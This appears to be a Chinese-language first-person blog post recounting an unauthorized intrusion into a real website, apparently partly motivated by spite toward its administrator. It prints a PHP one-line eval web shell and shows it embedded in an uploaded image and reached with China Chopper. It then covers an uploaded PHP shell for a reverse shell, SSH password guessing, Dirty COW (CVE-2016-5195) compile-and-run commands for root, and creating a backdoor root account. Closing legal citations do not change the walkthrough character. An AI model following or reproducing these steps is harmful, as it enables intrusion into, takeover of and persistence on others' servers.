注：本人是个菜鸟。

一、利用文件上传漏洞获取webshell。

确定要攻击的目标网站。

图上的目标站域名过期了，只能通过ip地址访问。

大概在去年的时候，对目标站实施了入侵，具体如下：

本想着通过sql注入的方式方式爆出用户密码，通过sqlmap扫描注入发现没有注入点，但但得到了数据库是mysql。后来想着干脆自己去目标站注册一个账户。当然用户信息肯定是随便填的。登录成功之后发现我登录的用户有头像上传功能。而且有个默认的头像。通过右键查看图片得到当前图片路径。

这回知道了路径。那么就开始吧。

通过浏览目标站，得到目标站使用php语言。先准备一个php一句话木马 <?php @eval($_POST[pp]);?>。直接上传。那肯定是不成功的，校验了后缀格式。那么把 .php一句话木马后缀改为.jpg。在上传，使用brupsuite 抓包 再更改后缀为php，还是失败。既然普通的php码不能上传，那么就制作一个图片一句话木马。在图片里面植入一句话木马。

直接上传制作好的图片木马。提示上传成功。右键查看我们上的木马图片。发现名称已经被替换成14828287266_3_image.jgp 这个。直接复制图片地址，使用中国菜刀进行连接木马，连接失败，不知道啥原因。百度搜索发现 IIS6.0有文件上传解析漏洞 如：1.php;2.jpg，是图片，但是在IIS6.0里解析的时候，是忽略掉分号后面的字串，直接解析为1.php，抓包再使用00截断上传，还是无果。正要放弃的时候，想到一个方法，将一个普通的图片直接右键编辑，在最底下加入php一句话木马，上传成功，使用中国菜连接居然连接上了。

在通过访问这些目录找到目标站的数据库配置信息。

获取目标站的数据库。连上数据库简单的看了下mysql版本为5.7.11。

本来还想着利用mysql的system命令执行shell。结果这个版本没有这个命令

mysql> system ls;

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'system ls' at line 1

那么直接利用菜刀，上传一个php大马，来反弹一个shell。

访问php大马。

可以查看到当前服务器的版本信息。及所有用户。

那么剩下了就是怎样提权了，当时对linux提权不是很熟，所有暂时先放下了。

今年偶然也去目标站看看清况，看看我上传的大马有没有被管理员删除，直接访问网站，发现域名过期了，无法访问，再百度搜索该网站也搜不到，突然发现一篇帖子发现该网站管理员挺坏的啊。

那么通过ping ip 看到服务器没有关闭。直接把域名换成ip访问大马，访问成功，看来管理员已经放弃了这个服务器。既然这个网站管理员这么坏，当然要搞他一波。

二、liunx提权

利用php大马看一下服务器版本为 linux 2.6.32-573.22.1 当前用户为 apache

先上传一个 nc 来反弹当前shell 结果执行报错。

既然nc用不了。那么直接用ssh 直连。简单猜测一下 root 密码。

结果ssh一直连不上。通过端口扫描器，就只扫描到了80端口。

我严重怀疑这个管理员修改了22端口。百度怎么修改22端口 发现在这个文件保存着端口信息 /etc/ssh/sshd_config 打开看看，发现管理员修改了端口为2222

得到端口使用xshell工具用root账号简单的猜测了一下密码，无果。那么就试试普通用户。

发现一个用户名跟目标站的域名一样。果断通过这个用户名 进行ssh连接，简单的使用了几个密码尝试了一下后，就输入用户名当作密码，竟然连上了。那么接下来就利用这个普通用户进行提权。百度一波linux提权，看到gcc编译漏洞普通用户提权为root比较简单，就按照这个方式进行提权

执行到最后一行命令的时候。LD_AUDIT="\$ORIGIN"exec /proc/self/fd/3。就直接断开连接了。尝试几次之后果断放弃。

在百度了一波后发现脏牛linux 漏洞对于2.6.22以上版本都有影响。刚好目标站版本为2.6.23。符合提权环境。脏牛Linux本地提权漏洞复现(CVE-2016-5195)​www.jianshu.com

那么下载exp文件，上传到目标站的tmp目录(这里我用的是这个exp 也就是dirty.c文件)执行按照命令依次运行

1、 gcc -pthread dirty.c -o dirty -lcrypt

2、 ./dirty 密码 (这里的密码自己定义)

大概等个几分钟。看到这段就说明成功了。这里firefart就是root权限的用户。密码就是刚刚运行的 ./dirty 密码 (自己输的密码)

果断切换用户 su firefart 执行id查看当前权限。已经是root权限了。提权成功！

接下来肯定是创建一个用户并赋予root权限啦

useradd ceshi

passwd ceshi

usermod -g root ceshi

成功执行！

《中华人民共和国刑法》

第二百八十五条

【非法侵入计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。

【非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

【提供侵入、非法控制计算机信息系统程序、工具罪】提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款的规定处罚。

第二百八十六条

【破坏计算机信息系统罪】违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。 违反国家规定，对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作，后果严重的，依照前款的规定处罚。 故意制作、传播计算机病毒等破坏性程序，影响计算机系统正常运行，后果严重的，依照第一款的规定处罚。

结尾：不要干坏事哦！